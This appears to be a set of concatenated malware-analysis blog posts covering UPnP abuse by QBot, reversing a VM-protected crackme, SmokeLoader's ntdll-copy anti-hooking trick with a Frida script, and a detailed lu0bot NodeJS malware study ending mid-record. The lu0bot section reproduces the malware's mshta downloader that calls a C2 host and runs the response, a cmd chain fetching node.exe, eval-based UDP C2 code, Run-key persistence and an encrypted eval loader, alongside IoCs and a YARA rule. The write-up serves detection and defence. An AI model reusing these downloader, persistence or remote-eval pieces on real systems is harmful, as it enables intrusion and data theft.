From this point on, my analysis stopped for now. However, McAfee explains that a new binary is downloaded from the contacted C2 server, which re-adds the port forwarding rules and is responsible for the C2 communication. The blog article Iโve referenced above explains the whole functionality, so I recommend you to take a look at it, if you are interested in the next steps.
Final Words
As you can see UpnP contains many security flaws and can lead to a compromised network. If you have UpnP enabled in your companyโs network, I really recommend to check whether this is really needed and turn it off if it is not necessary.
So exams at university are coming up next, it will probably take some time until I can get my hands on the QBot C2 protocol or the proxy binary. I do however, want to look at these two functionalities next.
Taming Virtual Machine Based Code Protection โ 1
Overcoming obfuscation in binaries has always been an interesting topic for me, especially in combination with malware. Over the last weeks Iโve been playing around with Virtualised Code Protection in order to see how well I could handle it.
I decided to download a simple crack-me challenge which is obfuscated with this technique. It takes me some time to reverse everything, so there will be atleast 2 blog articles about my little project.

Virtualised Code Protection
Each architecture has a defined instruction set. By looking up the instructions to the corresponding bytes, we are able to translate these bytes into disassembly. The unit that actually executes these bytes is the CPU.
Virtual machine based code protection emulates a processor and thus switches our usual instruction set against a custom one. So in order to really understand what a virtual machine hardened binary is doing on a low level basis, we need to reverse the virtual machine first. This means we have to understand the custom instruction set.
I want to show you a practical example of how such a custom instruction can look like and be discovered.
Practical Example
Preparing the virtual machine
The challenge demands a serial key and a username. Both of them need certain values for the serial key to be valid. After entering a username and a serial key, the length of both of them are checked first.

Next At the bottom of this routine, we can already spot 2 interesting functions and operations which push the success or failure message onto the stack.

The function InitialiseVM
is where it gets interesting for us. If you just look quickly through the disassembly in the figure below, you will see that there are multiple buffers allocated and static values written into an internal structure. Furthermore it is filled with function pointers. Each one of those functions represents a custom instruction. This routine is used to allocate the virtual address space our virtual machine will use for emulation, as well as a table to select custom instructions from.

Next is the CheckSerial
function, which implements the virtual machine loop that emulates the virtual processor unit.

In the block at loc_4015E5
the function sub_4013DF
is executed each iteration. Afterwards the byte which the address in ESI+0x7C
points to is used to calculate the dynamic call at the end of the current block we are talking about (call dword ptr [esi+eax*4+80h]
). That means that the byte influencing which function to enter, is deciding which custom instruction to execute. Before we look at how some of the opcodes are actually parsed here, letโs review how the virtualised address space of this VM looks like.

Executing custom instructions
The function sub_4013DF
is called each iteration and reads bytes from the buffer which contains opcodes for custom instructions. The first one has a size of 5 bytes. Each of them is used by the virtual machine for translating these opcodes into a valid operation. At the moment of writing this article, I did not fully explore this function yet. However, I am confident that the last 2 bytes of an instruction are used to influence registers.

Upon returning from this function, the program takes the first byte of the ESI+0x7C
structure and uses it to determine which function from the previously allocated function table is called. The first run returns EAX=3
, so we are dealing with the custom instruction with instruction id 3.
Letโs jump into our first custom instruction.

The function sub_401271
has 31 XRefs and is used in every function from the function table. Before the function is called, the pointer to ESI+7C
, our 0x24 buffer holding the custom opcodes are retrieved.0xC
is added, that means we are pointing at the byte at ESI+7C+0xC
, the 4th DWORD
in this buffer.
The routine accesses the third byte of the current opcode and is responsible for determining the instruction type. The first four bits decide wether it is an instruction utilizing 2 registers, a memory read or moving an immediate value into a register. The second 4 bits influence the size of the byte that will be moved around. These 4 bits are zero extended into bytes.

Take a look at the figure below. The result of our InstrType
function is saved in ebp+0x4
. Next the memory address which ESI+0x20
points at is decreased and filled with the value we just computed. Doesnโt this look familiar ? The stack is also decreased if we put data onto it.

It seems that the custom instruction we just investigated is a custom PUSH
instruction. ESI+0x20
points to the virtual stack that is emulated by this virtual machine. Since the pointer at ESI+0x4C
is increased here after an instruction, it might hold the virtual instruction pointer.
So far we figured out what the first 3 opcodes do and we have an idea what the last 2 ones are responsible for. In order to give a proper answer on how they are used, it is needed to look at more than just 1 virtual instruction execution.

Conclusion
So it just took me a complete blog article to really explain how to reverse a single custom instruction of a binary hardened with Virtualised Code Protection ;-). As you can see, this kind of software protection is very powerful.
I will finish this challenge for sure and will write a second blog article about how I solved it.
Examining Smokeloaderโs Anti Hooking technique
Hooking is a technique to intercept function calls/messages or events passed between software, or in this case malware. The technique can be used for malicious, as well as defensive cases.
Rootkits for example can hook API calls to make themselves invisible from analysis tools, while we as defenders can use hooking to gain more knowledge of malware or build detection mechanisms to protect customers.
Cybersecurity continues to be a game of cat and mouses, and while we try to build protections, blackhats will always try to bypass these protection mechanisms. Today I want to show you how SmokeLoader bypasses hooks on ntdll.dll
and how Frida can be used to hook library functions.
The bypass was also already explained in a blog article from Checkpoint[1] written by Israel Gubi. It also covers a lot more than I do regarding Smokeloader, so it is definitely worth reading too.
Hooking with Frida
If youโve read my previous blog articles about QBot, you are familiar with the process iteration and AV detection[3]. It iterates over processes and compares the process name with entries in a black list containing process names of common AV products. If one process name matches with an entry, QBot quits its execution.
Frida is a Dynamic Instrumentation Toolkit which can be used to write dynamic analysis scripts in high level languages, in this case JavaScript. If you want to know more about this technology, I advice you to read to visit this website[4] and read its documentation.
We can write a small Frida script to hook the lstrcmpiA
function in order to investigate which process names are in the black list.
def main(): """Main.""" # argv[1] is our malware sample pid = frida.spawn(sys.argv[1]) sess = frida.attach(pid) script = sess.create_script(""" console.log("[+] Starting Frida script") var lstrcmpiA = ptr("0x76B43E8E") console.log("[+] Hooking lstrcmpiA at " + lstrcmpiA) Interceptor.attach(lstrcmpiA, { onEnter: function(args) { console.log("[+][+] Called strcmpiA"); console.log("[+][+] Arg1Addr = " + args[0]); console.log("[+][+] Buffer"); pretty_print(args[0], 0x30); console.log("[+][+] Arg2Addr = " + args[1]); console.log("[+][+] Buffer"); pretty_print(args[1], 0x30); }, onLeave: function(retval) { console.log("[+][+] Returned from strcmpiA") } }); function pretty_print(addr, sz) { var bufptr = ptr(addr); var bytearr = Memory.readByteArray(bufptr, sz); console.log(bytearr); }; """) script.load() frida.resume(pid) sys.stdin.read() sess.detach()
We attach to the malicious process and hook the lstrcmpiA
function at static address. When analysing malware, we have (most of the time) the privilege to control and adjust our environment as much as we want. If you turn off ASLR
and use snapshots, using Frida with static pointers is pretty convenient, because most functions will always have the same address. However, itโs also possible to calculate the addresses dynamically. lstrcmpiA
has 2 arguments, which are both pointers of type LPSTR
. So we just resolve the pointers, fill 0x30
bytes starting at pointer address into a ByteArray and print it.

Smokeloaderโs Anti Hooking technique
So how does Smokeloader bypass hooks? Well it can do it atleast for the ntdll.dll
library. During execution Smokeloader retrieves the Temp folder path and generates a random name. If a file with the generated name already exists in the temp folder, it is deleted with DeleteFileW
.

Next the original ntdll.dll
file is copied from system32
to the temp folder with the exact name it just generated. This leads to a copy of this mentioned library being placed in the temp directory.


Instead of loading the real ntdll.dll
file, the copy is loaded into memory by calling LdrLoadDll
.

Most AV vendors, as well as analysts probably implemented their hooks on ntdll.dll
, so the references to the copied ntdll.dll
file will be missed.
Smokeloader continues to call functions from this copied DLL, using for example function calls like NtQueryInformationProcess
to detect wether a debugger is attached to it.
Final Words
While analysing SmokeLoader at work, I stumbled across this AntiHook mechanism, which I havenโt seen before, so I wanted to share it here :-).
Iโve also only scratched on the surface of what Frida is capable of. I might work on something more complex next time.
Lu0bot โ An unknown NodeJS malware using UDP
In February/March 2021, A curious lightweight payload has been observed from a well-known load seller platform. At the opposite of classic info-stealers being pushed at an industrial level, this one is widely different in the current landscape/trends. Feeling being in front of a grey box is somewhat a stressful problem, where you have no idea about what it could be behind and how it works, but in another way, it also means that you will learn way more than a usual standard investigation.
I didnโt feel like this since Qulab and at that time, this AutoIT malware gave me some headaches due to its packer. but after cleaning it and realizing itโs rudimentary, the challenge was over. In this case, analyzing NodeJS malware is definitely another approach.
I will just expose some current findings of it, I donโt have all answers, but at least, it will door opened for further researches.
Disclaimer: I donโt know the real name of this malware.
Minimalist C/C++ loader
When lu0bot is deployed on a machine, the first stage is a 2.5 ko lightweight payload which has only two section headers.

Written in C/C++, only one function has been developped.
void start()
{
char *buff;
buff = CmdLine;
do
{
buff -= 'NPJO'; // The key seems random after each build
buff += 4;
}
while ( v0 < &CmdLine[424] );
WinExec(CmdLine, 0); // ... to the moon ! \o/
ExitProcess(0);
}
This rudimentary loop is focused on decrypting a buffer, unveiling then a one-line JavaScript code executed through WinExec()

Indeed, MSHTA is used executing this malicious script. So in term of monitoring, itโs easy to catch this interaction.
mshta "javascript: document.write();
42;
y = unescape('%312%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F%321%616%654%62%7E%321%32').split('~');
103;
try {
x = 'WinHttp';
127;
x = new ActiveXObject(x + '.' + x + 'Request.5.1');
26;
x.open('GET', y[1] + '&a=' + escape(window.navigator.userAgent), !1);
192;
x.send();
37;
y = 'ipt.S';
72;
new ActiveXObject('WScr' + y + 'hell').Run(unescape(unescape(x.responseText)), 0, !2);
179;
} catch (e) {};
234;;
window.close();"
Setting up NodeJs
Following the script from above, it is designed to perform an HTTP GET request from a C&C (letโs say itโs the first C&C Layer). Then the response is executed as an ActiveXObject.
new ActiveXObject('WScr' + y + 'hell').Run(unescape(unescape(x.responseText)), 0, !2);
Letโs inspect the code (response) step by step
cmd /d/s/c cd /d "%ALLUSERSPROFILE%" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe [...]
- Set the console into %ALLUSERPROFILE% path
- Create fake folder DNTException
[...] || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);
x.Open("GET",unescape(WScript.Arguments(0^)^),false^);
x.Send(^);
b = new ActiveXObject("ADODB.Stream"^);
b.Type=1;
b.Open(^);
b.Write(x.ResponseBody^);
b.SaveToFile(WScript.Arguments(1^),2^);
> get1618489872131.txt
& cscript /nologo /e:jscript get1618489872131.txt "http://hri2.xyz/hri/?%HEXVALUE%&b=%HEXVALUE%" node.cab
& expand node.cab node.exe
& del get1618489872131.txt node.cab
) [...]
- Generate a js code-focused into downloading a saving an archive that will be named โnode.cabโ
- Decompress the cab file with expand command and renamed it โnode.exeโ
- Delete all files that were generated when itโs done
[...] & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1618489872131.txt [...]
- Recreate a js script that will execute again some code
[...] cscript /nologo /e:jscript get1618489872131.txt "node -e eval(FIRST_STAGE_NODEJS_CODE)" & del get1618489872131.txt [...]
In the end, this whole process is designed for retrieving the required NodeJS runtime.

Matryoshka Doll(J)s
Luckily the code is in fact pretty well written and comprehensible at this layer. It is 20~ lines of code that will build the whole malware thanks to one and simple API call: eval.

From my own experience, Iโm not usually confronted with malware using UDP protocol for communicating with C&Cโs. Furthermore, I donโt think in the same way, itโs usual to switch from TCP to UDP like it was nothing. When I analyzed it for the first time, I found it odd to see so many noisy interactions in the machine with just two HTTP requests. Then I realized that I was watching the visible side of a gigantic icebergโฆ

For those who are uncomfortable with NodeJS, the script is designed to sent periodically UDP requests over port 19584 on two specific domains. When a message is received, it is decrypted with a standard XOR decryption loop, the output is a ready-to-use code that will be executed right after with eval. Interestingly the first byte of the response is also part of the key, so it means that every time a response is received, it is likely dynamically different even if itโs the same one.
In the end, lu0bot is basically working in that way

After digging into each code executed, It really feels that you are playing with matryoshka dolls, due to recursive eval loops unveiling more content/functions over time. Itโs also the reason why this malware could be simple and complex at the same time if you arenโt experienced with this strategy.

For adding more nonsense it is using different encryption algorithms whatever during communications or storing variables content:
- XOR
- AES-128-CBC
- Diffie-Hellman
- Blowfish
Understanding Lu0bot variables
S (as Socket)
- Fundamental Variable
- UDP communications with C&Cโs
- Receiving main classes/variables
- Executing โmain branchesโ code
function om1(r,q,m) # Object Message 1
|--> r # Remote Address Information
|--> q # Query
|--> m # Message
function c1r(m,o,d) # Call 1 Response
|--> m # Message
|--> o # Object
|--> d # Data
function sc/c1/c2/c3(m,r) # SetupCall/Call1/Call2/Call3
|--> m # Message
|--> r # Remote Address Information
function ss(p,q,c,d) # ScriptSetup / SocketSetup
|--> p # Personal ID
|--> q # Query
|--> c # Crypto/Cipher
|--> d # Data
function f() # UDP C2 communications
KO (as Key Object ?)
- lu0bot mastermind
- Containing all bot information
- C&C side
- Client side
- storing fundamental handle functions for task manager(s)
- eval | buffer | file
ko {
pid: # Personal ID
aid: # Address ID (C2)
q: # Query
t: # Timestamp
lq: {
# Query List
},
pk: # Public Key
k: # Key
mp: {}, # Module Packet/Package
mp_new: [Function: mp_new], # New Packet/Package in the queue
mp_get: [Function: mp_get], # Get Packet/Package from the queue
mp_count: [Function: mp_count], # Packer/Package Counter
mp_loss: [Function: mp_loss], # ???
mp_del: [Function: mp_del], # Delete Packet/Package from the queue
mp_dtchk: [Function: mp_dtchk], # Data Check
mp_dtsum: [Function: mp_dtsum], # Data Sum
mp_pset: [Function: mp_pset], # Updating Packet/Package from the queue
h: { # Handle
eval: [Function],
bufwrite: [Function],
bufread: [Function],
filewrite: [Function],
fileread: [Function]
},
mp_opnew: [Function: mp_opnew], # Create New
mp_opstat: [Function: mp_opstat], # get stats from MP
mp_pget: [Function], # Get Packet/Package from MP
mp_pget_ev: [Function] # Get Packet/Package Timer Intervals
}
MP
- Module Package/Packet/Program ?
- Monitoring and logging an executed task/script.
mp:
{ key: # Key is Personal ID
{ id: , # Key ID (Event ID)
pid: , # Personal ID
gen: , # Starting Timestamp
last: , # Last Tick Update
tmr: [Object], # Timer
p: {}, # Package/Packet
psz: # Package/Packet Size
btotal: # ???
type: 'upload', # Upload/Download type
hn: 'bufread', # Handle name called
target: 'binit', # Script name called (From C&C)
fp: , # Buffer
size: , # Size
fcb: [Function], # FailCallBack
rcb: [Function], # ???
interval: 200, # Internval Timer
last_sev: 1622641866909, # Last Timer Event
stmr: false # Script Timer
}
Ingenious trick for calling functions dynamically
Usually, when you are reversing malware, you are always confronted (or almost every time) about maldev hiding API Calls with tricks like GetProcAddress or Hashing.
function sc(m, r) {
if (!m || m.length < 34) return;
m[16] ^= m[2];
m[17] ^= m[3];
var l = m.readUInt16BE(16);
if (18 + l > m.length) return;
var ko = s.pk[r.address + ' ' + r.port];
var c = crypto.createDecipheriv('aes-128-cbc', ko.k, m.slice(0, 16));
m = Buffer.concat([c.update(m.slice(18, 18 + l)), c.final()]);
m = {
q: m.readUInt32BE(0),
c: m.readUInt16BE(4),
ko: ko,
d: m.slice(6)
};
l = 'c' + m.c; // Function name is now saved
if (s[l]) s[l](m, r);
}
As someone that is not really experienced in the NodeJS environment, I wasnโt really triggering the trick performed here but for web dev, I would believe this is likely obvious (or maybe Iโm wrong). The thing that you need to really take attention to is what is happening with โcโ char and m.c.
By reading the official NodeJs documemtation: The Buffer.readUInt16BE() method is an inbuilt application programming interface of class Buffer within the Buffer module which is used to read 16-bit value from an allocated buffer at a specified offset.
Buffer.readUInt16BE( offset )
In this example it will return in a real case scenario the value โ1โ, so with the variable l, it will create โc1โ , a function stored into the global variable s. In the end, s[โc1โ](m,r) is also meaning s.c1(m,r).
A well-done task manager architecture
Q variable used as Macro PoV Task Manager
- โQโ is designed to be the main task manager.
- If Q value is not on LQ, adding it into LQ stack, then executing the code content (with eval) from m (message).
if (!lq[q]) { // if query not in the queue, creating it
lq[q] = [0, false];
setTimeout(function() {
delete lq[q]
}, 30000);
try {
for (var p = 0; p < m.d.length; p++)
if (!m.d[p]) break;
var es = m.d.slice(0, p).toString(); // es -> Execute Script
m.d = m.d.slice(p + 1);
if (!m.d.length) m.d = false;
eval(es) // eval, our sweat eval...
} catch (e) {
console.log(e);
}
return;
}
if (lq[q][0]) {
s.ss(ko.pid, q, 1, lq[q][1]);
}
MP variable used as Micro PoV Task Manager
- โMPโ is designed to execute tasks coming from C&Cโs.
- Each task is executed independantly!
function mp_opnew(m) {
var o = false; // o -> object
try {
o = JSON.parse(m.d); // m.d (message.data) is saved into o
} catch (e) {}
if (!o || !o.id) return c1r(m, -1); // if o empty, or no id, returning -1
if (!ko.h[o.hn]) return c1r(m, -2); // if no functions set from hn, returning -2
var mp = ko.mp_new(o.id); // Creating mp ---------------------------
for (var k in o) mp[k] = o[k]; |
var hr = ko.h[o.hn](mp); |
if (!hr) { |
ko.mp_del(mp); |
return c1r(m, -3) // if hr is incomplete, returning -3 |
} |
c1r(m, hr); // returning hr |
} |
|
function mp_new(id, ivl) { <----------------------------------------------------
var ivl = ivl ? ivl : 5000; // ivl -> interval
var now = Date.now();
if (!lmp[id]) lmp[id] = { // mp list
id: id,
pid: ko.pid,
gen: now,
last: now,
tmr: false,
p: {},
psz: 0,
btotal: 0
};
var mp = lmp[id];
if (!mp.tmr) mp.tmr = setInterval(function() {
if (Date.now() - mp.last > 1000 * 120) {
ko.mp_del(id);
return;
}
if (mp.tcb) mp.tcb(mp);
}, ivl);
mp.last = now;
return mp;
}
O (Object) โ C&C Task
This object is receiving tasks from the C&C. Technically, this is (I believed) one of the most interesting variable to track with this malware..
- It contains 4 or 5 values
- type.
- upload
- download
- hn : Handle Name
- sz: Size (Before Zlib decompression)
- psz: ???
- target: name of the command/script received from C&C
- type.
// o content
{
id: 'XXXXXXXXXXXXXXXXX',
type: 'upload',
hn: 'eval',
sz: 9730,
psz: 1163,
target: 'bootstrap-base.js',
}
on this specific scenario, itโs uploading on the bot a file from the C&C called โbootstrap-base.jsโ and it will be called with the handle name (hn) function eval.
Summary

Aggressive telemetry harvester
Usually, when malware is gathering information from a new bot it is extremely fast but here for exactly 7/8 minutes your VM/Machine is literally having a bad time.
Preparing environment

Gathering system information
Process info
tasklist /fo csv /nh
wmic process get processid,parentprocessid,name,executablepath /format:csv
qprocess *
Network info
ipconfig.exe /all
route.exe print
netstat.exe -ano
systeminfo.exe /fo csv
Saving Environment & User path(s)

EI_DESKTOP
|--> st.env['EI_HOME'] + '\\Desktop';
EI_DOCUMENTS
|--> st.env['EI_HOME'] + '\\Documents';
|--> st.env['EI_HOME'] + '\\My Documents';
EI_PROGRAMFILES1
|--> var tdir1 = exports.env_get('ProgramFiles');
|--> var tdir2 = exports.env_get('ProgramFiles(x86)');
|--> st.env['EI_HOME'].substr(0,1) + '\\Program Files (x86)';
EI_PROGRAMFILES2
|--> var tdir3 = exports.env_get('ProgramW6432');
|--> st.env['EI_HOME'].substr(0,1) + '\\Program Files';
EI_DOWNLOADS
|--> st.env['EI_HOME'] + '\\Downloads';
Console information
These two variables are basically conditions to check if the process was performed. (ISCONPROBED is set to true when the whole thing is complete).
env["ISCONPROBED"] = false;
env["ISCONSOLE"] = true;
Required values for completing the task..
env["WINDIR"] = val;
env["TEMP"] = val;
env["USERNAME_RUN"] = val;
env["USERNAME"] = val;
env["USERNAME_SID"] = s;
env["ALLUSERSPROFILE"] = val;
env["APPDATA"] = val;
Checking old windows versions
Curiously, itโs checking if the bot is using an old Microsoft Windows version.
- NT 5.X โ Windows 2000/XP
- NT 6.0 โ Vista
function check_oldwin(){
var osr = os.release();
if(osr.indexOf('5.')===0 || osr.indexOf('6.0')===0) return osr;
return false;
}
exports.check_oldwin = check_oldwin;
This is basically a condition after for using an alternative command with pslist
function ps_list_alt(cb){
var cmd = ['qprocess','*'];
if(check_oldwin()) cmd.push('/system');
....
Checking ADS streams for hiding content into it for later

Harvesting functions 101
bufstore_save(key,val,opts) # Save Buffer Storage
bufstore_get(key,clear) # Get Buffer Storage
strstrip(str) # String Strip
name_dirty_fncmp(f1,f2) # Filename Compare (Dirty)
dirvalidate_dirty(file) # Directory Checking (Dirty)
file_checkbusy(file) # Checking if file is used
run_detached(args,opts,show) # Executing command detached
run(args,opts,cb) # Run command
check_oldwin() # Check if Bot OS is NT 5.0 or NT 6.0
ps_list_alt(cb) # PS List (Alternative way)
ps_list_tree(list,results,opts,pid) # PS List Tree
ps_list(arg,cb) # PS list
ps_exist(pid) # Check if PID Exist
ps_kill(pid) # Kill PID
reg_get_parse(out) # Parsing Registry Query Result
reg_hkcu_get() # Get HKCU
reg_hkcu_replace(path) # Replace HKCU Path
reg_get(key,cb) # Get Content
reg_get_dir(key,cb) # Get Directory
reg_get_key(key,cb) # Get SubKey
reg_set_key(key,value,type,cb) # Set SubKey
reg_del_key(key,force,cb) # Del SubKey
get_einfo_1(ext,cb) # Get EINFO Step 1
dirlistinfo(dir,limit) # Directory Listing info
get_einfo_2(fcb) # Get EINFO Step 2
env_get(key,kv,skiple) # Get Environment
console_get(cb) # Get Console environment variables
console_get_done(cb,err) # Console Try/Catch callback
console_get_s0(ccb) # Console Step 0
console_get_s1(ccb) # Console Step 1
console_get_s2(ccb) # Console Step 2
console_get_s3(ccb) # Console Step 3
ads_test() # Checking if bot is using ADS streams
diskser_get_parse(dir,out) # Parse Disk Serial command results
diskser_get(cb) # Get Disk Serial
prepare_dirfile_env(file,cb) # Prepare Directory File Environment
prepare_file_env(file,cb) # Prepare File Environment
hash_md5_var(val) # MD5 Checksum
getosinfo() # Get OS Information
rand(min, max) # Rand() \o/
ipctask_start() # IPC Task Start (Interprocess Communication)
ipctask_tick() # IPC Task Tick (Interprocess Communication)
baseinit_s0(cb) # Baseinit Step 0
baseinit_s1(cb) # Baseinit Step 1
baseinit_s2(cb) # Baseinit Step 2
baseinit_einfo_1_2(cb) # Baseinit EINFO
Funky Persistence
The persistence is saved in the classic HKCU Run path
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Intel Management Engine Components 4194521778"="wscript.exe /t:30 /nologo /e:jscript \"C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 750293792\" \"C:\ProgramData\Intel\Intel(R) Management Engine Components\" 2371015226"
Critical files are stored into a fake โIntelโ folder in ProgramData.
ProgramData
|-- Intel
|-- Intel(R) Management Engine Components
|--> Intel MEC 246919961
|--> Intel MEC 750293792
Intel MEC 750293792
new ActiveXObject("WScript.shell").Run('"C:\ProgramData\DNTException\node.exe" "' + WScript.Arguments(0) + '\Intel MEC 246919961" ' + WScript.Arguments(1), 0, false);
Intel MEC 246919961
var c = new Buffer((process.argv[2] + 38030944).substr(0, 8));
c = require("crypto").createDecipheriv("bf", c, c);
global["\x65\x76" + "\x61\x6c"](Buffer.concat([c.update(new Buffer("XSpPi1eP/0WpsZRcbNXtfiw8cHqIm5HuTgi3xrsxVbpNFeB6S6BXccVSfA/JcVXWdGhhZhJf4wHv0PwfeP1NjoyopLZF8KonEhv0cWJ7anho0z6s+0FHSixl7V8dQm3DTlEx9zw7nh9SGo7MMQHRGR63gzXnbO7Z9+n3J75SK44dT4fNByIDf4rywWv1+U7FRRfK+GPmwwwkJWLbeEgemADWttHqKYWgEvqEwrfJqAsKU/TS9eowu13njTAufwrwjqjN9tQNCzk5olN0FZ9Cqo/0kE5+HWefh4f626PAubxQQ52X+SuUqYiu6fiLTNPlQ4UVYa6N61tEGX3YlMLlPt9NNulR8Q1phgogDTEBKGcBlzh9Jlg3Q+2Fp84z5Z7YfQKEXkmXl/eob8p4Putzuk0uR7/+Q8k8R2DK1iRyNw5XIsfqhX3HUhBN/3ECQYfz+wBDo/M1re1+VKz4A5KHjRE+xDXu4NcgkFmL6HqzCMIphnh5MZtZEq+X8NHybY2cL1gnJx6DsGTU5oGhzTh/1g9CqG6FOKTswaGupif+mk1lw5GG2P5b5w==", "\x62\x61\x73" + "\x65\x36\x34")), c.final()]).toString());
The workaround is pretty cool in the end
- WScript is launched after waiting for 30s
- JScript is calling โIntel MEC 750293792โ
- โIntel MEC 750293792โ is executing node.exe with arguments from the upper layer
- This setup is triggering the script โIntel MEC 246919961โ
- the Integer value from the upper layer(s) is part of the Blowfish key generation
- global[โ\x65\x76โ + โ\x61\x6cโ] is in fact hiding an eval call
- the encrypted buffer is storing the lu0bot NodeJS loader.
Ongoing troubleshooting in production ?
It is possible to see in some of the commands received, some lines of codes that are disabled. Unknown if itโs intended or no, but itโs pretty cool to see about what the maldev is working.

It feels like a possible debugging scenario for understanding an issue.

Outdated NodeJS still living and kickinโ
Interestingly, lu0bot is using a very old version of node.exe, way older than could be expected.

This build (0.10.48), is apparently from 2016, so in term of functionalities, there is a little leeway for exploiting NodeJS, due that most of its APIs wasnโt yet implemented at that time.


The issue mentioned above is โseenโ when lu0bot is pushing and executing โbootstrap-base.jsโ. On build 0.10.XXX, โBufferโ wasnโt fully implemented yet. So the maldev has implemented missing function(s) on this specific version, I found this โinterestingโ, because it means it will stay with a static NodeJS runtime environment that wonโt change for a while (or likely never). This is a way for avoiding cryptography troubleshooting issues, between updates it could changes in implementations that could break the whole project. So fixed build is avoiding maintenance or unwanted/unexpected hotfixes that could caused too much cost/time consumption for the creator of lu0bot (everything is business \o/).

Of course, We couldnโt deny that lu0bot is maybe an old malware, but this statement needs to be taken with cautiousness.
By looking into โbootstrap-base.jsโ, the module is apparently already on version โ6.0.15โ, but based on experience, versioning is always a confusing thing with maldev(s), they have all a different approach, so with current elements, it is pretty hard to say more due to the lack of samples.
What is the purpose of lu0bot ?
Well, to be honest, I donโt knowโฆ I hate making suggestions with too little information, itโs dangerous and too risky. I donโt want to lead people to the wrong path. Itโs already complicated to explain something with no โpublicโ records, even more, when it is in a programming language for that specific purpose. At this stage, Itโs smarter to focus on what the code is able to do, and it is certain that itโs a decent data collector.
Also, this simplistic and efficient NodeJS loader code saved at the core of lu0bot is basically everything and nothing at the same time, the eval function and its multi-layer task manager could lead to any possibilities, where each action could be totally independent of the others, so thinking about features like :
- Backdoor ?
- Loader ?
- RAT ?
- Infostealer ?
All scenario are possible, but as i said before I could be right or totally wrong.
Where it could be seen ?
Currently, it seems that lu0bot is pushed by the well-known load seller Garbage Cleaner on EU/US Zones irregularly with an average of possible 600-1000 new bots (each wave), depending on the operator(s) and days.
Appendix
IoCs
IP
- 5.188.206[.]211
lu0bot loader C&Cโs (HTTP)
- hr0[.]xyz
- hr1[.]xyz
- hr2[.]xyz
- hr3[.]xyz
- hr4[.]xyz
- hr5[.]xyz
- hr6[.]xyz
- hr7[.]xyz
- hr8[.]xyz
- hr9[.]xyz
- hr10[.]xyz
lu0bot main C&Cโs (UDP side)
- lu00[.]xyz
- lu01[.]xyz
- lu02[.]xyz
- lu03[.]xyz
Yara
rule lu0bot_cpp_loader
{
meta:
author = "Fumik0_"
description = "Detecting lu0bot C/C++ lightweight loader"
strings:
$hex_1 = {
BE 00 20 40 00
89 F7
89 F0
81 C7 ?? 01 00 00
81 2E ?? ?? ?? ??
83 C6 04
39 FE
7C ??
BB 00 00 00 00
53 50
E8 ?? ?? ?? ??
E9 ?? ?? ?? ??
}
condition:
(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and
(filesize > 2KB and filesize < 5KB) and
any of them
}
IoCs
fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2 Lu0bot loader.exe c88e27f257faa0a092652e42ac433892c445fc25dd445f3c25a4354283f6cdbf Lu0bot loader.exe b8b28c71591d544333801d4673080140a049f8f5fbd9247ed28064dd80ef15ad Lu0bot loader.exe 5a2264e42206d968cbcfff583853a0e0d4250f078a5e59b77b8def16a6902e3f Lu0bot loader.exe f186c2ac1ba8c2b9ab9b99c61ad3c831a6676728948ba6a7ab8345121baeaa92 Lu0bot loader.exe 8d8b195551febba6dfe6a516e0ed0f105e71cf8df08d144b45cdee13d06238ed response1.bin 214f90bf2a6b8dffa8dbda4675d7f0cc7ff78901b3c3e03198e7767f294a297d response2.bin c406fbef1a91da8dd4da4673f7a1f39d4b00fe28ae086af619e522bc00328545 response3.bin ccd7dcdf81f4acfe13b2b0d683b6889c60810173542fe1cda111f9f25051ef33 Intel MEC 246919961 e673547a445e2f959d1d9335873b3bfcbf2c4de2c9bf72e3798765ad623a9067 Intel MEC 750293792
Example of lu0bot interaction
ko
{ pid: 'XXXXXX',
aid: '5.188.206.211 19584',
q: XXXXXXXXXX,
t: XXXXXXXXXXXXX,
lq:
{ ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 30 00 00 00 00 09 00 00 26 02> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ] },
pk: 'BASE64_ENCRYPTED',
k: <Buffer 3c 60 22 73 97 cc 76 22 bc eb b5 79 46 3d 05 9e>,
mp:
{ XXXXXXXXXXXX:
{ id: 'XXXXXXXXXXXX',
pid: 'XXXXXXX',
gen: XXXXXXXXXXXXX,
last: XXXXXXXXXXXXX,
tmr: [Object],
p: {},
psz: 1163,
btotal: 0,
type: 'download',
hn: 'bufread',
